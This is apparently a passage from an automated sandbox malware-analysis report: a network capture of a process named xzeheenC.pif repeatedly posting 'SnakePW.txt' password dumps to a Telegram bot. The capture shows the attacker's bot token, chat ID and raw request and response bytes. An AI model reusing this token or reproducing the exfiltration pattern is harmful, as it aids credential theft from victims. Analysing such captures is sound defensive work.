                                                                                                        2024-12-18 15:31:42 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419118,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535902,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        51192.168.2.849765149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:43 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd209da301b406
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:43 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 64 61 33 30 31 62 34 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd209da301b406Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:43 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:43 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:43 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419120,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535903,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        52192.168.2.849766149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:43 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2044a7ee04b8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:43 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 34 34 61 37 65 65 30 34 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2044a7ee04b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:44 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:44 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:44 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419122,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535904,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        53192.168.2.849767149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:44 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21101d4364c8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:44 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 31 30 31 64 34 33 36 34 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21101d4364c8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:44 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:44 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:44 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419124,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535904,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        54192.168.2.849773149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:45 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20b5944b821b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:45 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 62 35 39 34 34 62 38 32 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20b5944b821bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:45 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:45 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:45 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419126,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535905,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        55192.168.2.849774149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:45 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd205b7d4f4ac3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:45 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 62 37 64 34 66 34 61 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd205b7d4f4ac3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:46 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:46 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:46 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419128,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535906,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        56192.168.2.849775149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:46 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd212ca5861b19
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:46 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 32 63 61 35 38 36 31 62 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd212ca5861b19Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:47 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:46 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:47 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419130,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535906,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        57192.168.2.849781149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:47 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20cec3117c14
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:47 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 65 63 33 31 31 37 63 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20cec3117c14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:47 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:47 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
